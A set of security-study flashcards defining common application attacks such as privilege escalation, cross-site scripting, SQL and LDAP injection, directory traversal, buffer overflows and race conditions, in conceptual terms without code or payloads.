Application Attacks Flashcards
What is Privilege escalation
Vertical privilege escalation (or elevation) is where a user or application can access functionality or data that should not be available to them. For instance, a process might run with local administrator privileges, but a vulnerability allows the arbitrary code to run with higher system privileges.
Horizontal privilege escalation is where a user accesses functionality or data that is intended for another user. For instance, via a process running with local administrator privileges on a client workstation, the arbitrary code is able to execute as a domain account on an application server.
What is Cross-site scripting
Exploits the fact that the browser is likely to trust scripts that appear to come from a site the user has chosen to visit.
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
What is Injections
Can target other types of protocol where the application takes user input to construct a query, filter, or document.
What is Structured query language (SQL) injection attack
In a SQL injection attack, the threat actor modifies one or more of these four basic functions by adding code to some input accepted by the app, causing it to execute the attacker’s own set of SQL queries or parameters.
What is Dynamic link library (DLL)
Is a binary package that implements some sort of standard functionality, such as establishing a network connection or performing cryptography.
DLL injection is a vulnerability in the way the operating system allows one process to attach to another. This functionality can be abused by malware to force a legitimate process to load a malicious link library.
What is Lightweight directory access protocol (LDAP) injection attack
Another example of a query language. LDAP is specifically used to read and write network directory databases. A threat actor could exploit either unauthenticated access or a vulnerability in a client app to submit arbitrary LDAP queries.
What is Extensible markup language (XML) injection attack
Is used by apps for authentication and authorizations, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code.
What is Pointer/object dereference
A pointer is a variable that stores a memory location, rather than a value. Attempting to read or write that memory address via the pointer is called dereferencing. If the memory location is invalid or null (perhaps by some malicious process altering the execution environment), this creates a null pointer dereference type of exception, and the process will crash, probably. In some circumstances, this might also allow a threat actor to run arbitrary code.
A race condition is one means of engineering a null pointer dereference exception.
What is Directory traversal
Another type of injection attack performed against a web server. The threat actor submits a request for a file outside the web server’s root directory by submitting a path to navigate to the parent directory (../). This attack can succeed if the input is not filtered properly and access permissions on the file are the same as those on the web server directory.
What is Buffer overflows
A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer. One of the most common vulnerabilities is a stack overflow.
What is Race conditions
Occur when the outcome from an execution process is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.
A race condition is one means of engineering a null pointer dereference exception.
What is Time of check/time of use
A time of check to time of use (TOCTTOU) race condition occurs when there is a change between when an app checked a resource and when the app used the resource. This change invalidates the check. An attacker that can identify a TOCTTOU vulnerability will attempt to manipulate data after it has been checked but before the application can use this data to perform some operation.
What is Error handling
An application attack may cause an error message. In Windows, this may be of the following types: “Instruction could not be read or written,” “Undefined exception,” or “Process has encountered a problem.” One issue for error handling is that the application should not reveal configuration or platform details that could help an attacker. For example, an unhandled exception on a web application might show an error page that reveals the type and configuration of a database server.
What is Improper input handling
Most software accepts user input of some kind, whether the input is typed manually or passed to the program by another program, such as a browser passing a URL to a web server or a Windows process using another process via its application programming interface. Good programming practice dictates that input should be tested to ensure that it is valid; that is, the sort of data expected by the receiving process. Most application attacks work by passing invalid or maliciously constructed data to the vulnerable process. There are many ways of exploiting improper input handling, but many attacks can be described as either overflow-type attacks or injection-type attacks.
What is Replay attack
An attack where the attacker intercepts some authentication data and reuses it to try to re-establish a session.
Works by sniffing or guessing the token value and then submitting it to re-establish the session illegitimately.
